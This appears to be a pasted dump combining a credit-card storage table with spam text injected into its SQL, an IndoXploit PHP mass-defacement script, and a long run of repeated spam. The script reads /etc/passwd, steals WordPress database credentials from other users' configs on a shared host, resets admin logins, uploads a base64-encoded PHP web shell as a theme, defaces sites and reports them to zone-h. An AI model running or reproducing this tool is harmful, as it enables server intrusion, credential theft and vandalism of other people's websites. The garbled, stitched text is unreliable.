1

1. CREATE TABLE NextG3N APKAH  `credit_cards` (
2.   `id` int(11) NOT NULL AUTO_INCREMENT,
3.   `card_number` varchar(255) NOT NULL,
4.   `security_type` varchar(255) NOT NULL,
5.   `security_code` varchar(255) NOT NULL,
6.   `expiry_month` varchar(255) NOT NULL,
7.   `expiry_year` varchar(255) NOT NULL,
8.   PRIMARY KEY (`id`)
9. ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
10.  
11. <?php
12. //Tu5b0l3d
13. //IndoXploit
14. //http://indoxploit.blogspot.com/2015/10/config-and-auto-deface-in-worpdress.html
15.  
16. error_reporting(0);
17.  
18. cover("IndoXploit");
19.  
20. function save($data){
21.         $fp = @fopen("IndoXploit.htm", "a") or die("cant open file");
22.         fwrite($fp, $data);
23.         fclose($fp);
24. }
25.  
26. function anucurl($sites){
27.         $ch1 = curl_init ("$sites");
28. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
29. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
30. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
31. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
32. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
33. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
34. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
35. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
36. $data = curl_exec ($ch1);
37. return $data;
38.     }
39.  
40. function lohgin($cek, $web, $userr, $pass){
41.         $post = array(
42.                     "log" => "$userr",
43.                     "pwd" => "$pass",
44.                     "rememberme" => "forever",
45.                     "wp-submit" => "Log In",
46.                     "redirect_to" => "$web/wp-admin/",
47.                     "testcookie" => "1",
48.                     );
49. $ch = curl_init ("$cek");
50. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
51. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
52. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
53. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
54. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
55. curl_setopt ($ch, CURLOPT_POST, 1);
56. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
57. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
58. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
59. $data6 = curl_exec ($ch);
60. return $data6;
61.     }
62.  
63. function cover($indoXploit){
64.     echo "<center><font size='5px'> Created By: $indoXploit</font><br>";
65.     echo "hasil bisa dilihat di <a href='IndoXploit.htm' style='text-decoration: none'>IndoXploit.htm</a></center><br><br><br>";
66. }
67.  
68. function ambilKata($param, $kata1, $kata2){
69.     if(strpos($param, $kata1) === FALSE) return FALSE;
70.     if(strpos($param, $kata2) === FALSE) return FALSE;
71.     $start = strpos($param, $kata1) + strlen($kata1);
72.     $end = strpos($param, $kata2, $start);
73.     $return = substr($param, $start, $end - $start);
74.     return $return;
75. }
76.  
77.  
78. $a = file_get_contents('/etc/passwd');
79.     preg_match_all('/(.*?):x:/', $a, $data);
80.     foreach($data[1] as $user){
81. $baca = file_get_contents("/home/$user/public_html/wp-config.php");
82.  
83.  /* symlink('/home/'.$user.'/public_html/wp-config.php',$user.'- config.txt');  */
84.  
85. if($baca!=""){
86.    
87.  
88. /* $b = `cp /home/$user/public_html/index.php $user-index.txt`; */
89.  
90. $file1 = "$user-config.txt";
91. $fp2 = fopen($file1,"w");
92. fputs($fp2,$baca);
93.  
94. $file = @file_get_contents($file1);
95.  
96.  
97. echo $user."-> sukses<br>";
98.                     $host = ambilkata($file,"DB_HOST', '","'");
99.                     $username = ambilkata($file,"DB_USER', '","'");
100.                     $password = ambilkata($file,"DB_PASSWORD', '","'");
101.                     $db = ambilkata($file,"DB_NAME', '","'");
102.                     $dbprefix = ambilkata($file,"table_prefix  = '","'");
103.                     $user_baru = "Tu5b0l3d";
104.                     $password_baru = "Tu5b0l3d";
105.                     $prefix = $db.".".$dbprefix."users";
106.                     $sue = $db.".".$dbprefix."options";
107.                     $pass = md5("$password_baru");
108.                     $nick = "Hacked By Bl4ck Root"; //must "hacked"
109.  
110. echo "# Db Host: $host<br>";
111. echo "# Db user: $username<br>";
112. echo "# Db Password: $password<br>";
113. echo "# Db name: $db<br>";
114. echo "# Table_Prefix: $dbprefix<br>";
115.  
116. mysql_connect($host,$username,$password);
117.  
118.         mysql_select_db($db);
119.  
120.         $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
121.         $r=mysql_fetch_array($tampil);
122.         $id = $r[ID];
123.  
124.         $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
125.         $r2=mysql_fetch_array($tampil2);
126.         $target = $r2[option_value];
127.          echo "# $target<br>";
128.        
129.  
130.          mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
131.  
132. $site= "$target/wp-login.php";
133. $site2= "$target/wp-admin/theme-install.php?upload";
134. $a = lohgin($site, $target, $user_baru, $password_baru);
135. $b = lohgin($site2, $target, $user_baru, $password_baru);
136.            
137.  
138. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
139. echo "# token -> $anu2<br>";
140.  
141.  
142. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
143.  
144. $www = "m.php";
145. $fp5 = fopen($www,"w");
146. fputs($fp5,$upload3);
147.  
148. $c = file_get_contents($w);
149.    
150.   $post2 = array(
151.                     "_wpnonce" => "$anu2",
152.                     "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
153.                     "themezip" => "@m.php",
154.                     "install-theme-submit" => "Install Now",
155.                     );
156. $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
157. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
158. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
159. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
160. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
161. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
162. curl_setopt ($ch, CURLOPT_POST, 1);
163. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
164. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
165. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
166. $data3 = curl_exec ($ch);
167.  
168. $namafile = "wew.php";
169. $fp2 = fopen($namafile,"w");
170. fputs($fp2,$nick);
171.  
172. $y = date("Y");
173. $m = date("m");
174.  
175.  
176. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
177. curl_setopt($ch6, CURLOPT_POST, true);
178. curl_setopt($ch6, CURLOPT_POSTFIELDS,
179. array('file3'=>"@$namafile"));
180. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
181. curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
182. $postResult = curl_exec($ch6);
183. curl_close($ch6);
184.  
185. $as = "$target/k.php";
186. $bs = file_get_contents($as);
187.  if(preg_match("#hacked#si",$bs)){
188.                         echo "# <font color='green'>berhasil mepes...</font><br>";
189.                         echo "# $as<br>";
190.                         save($as."<br>");
191.                         echo "# zone-h: ";
192.                         $ch3 = curl_init ("http://www.zone-h.com/notify/single");
193.                         curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
194.                         curl_setopt ($ch3, CURLOPT_POST, 1);
195.                         curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=ID-IM&domain1=$as&hackmode=1&reason=1");
196.                        
197.         if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
198.                 echo  " Ok  <br><br>";
199.         }else{
200.                 echo " No <br><br>";}
201.                     }
202.                     else{
203.                         echo "# <font color='red'>gagal mepes...</font><br>";
204.                         echo "# coba aja manual: <br>";
205.                         echo "# $target/wp-login.php<br>";
206.                         echo "# username: $user_baru<br>";
207.                         echo "# password: $password_baru<br><br><br>";
208.  
209.                        
210.                     }
211.     }
212. else{
213.     echo "$user <= No<br>";
214. }
215.  
216.  
217.  
218. }
219.  
220.  
221. ?>
222.  
223.  
224.  
225.  
226. NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH NextG3N APKAH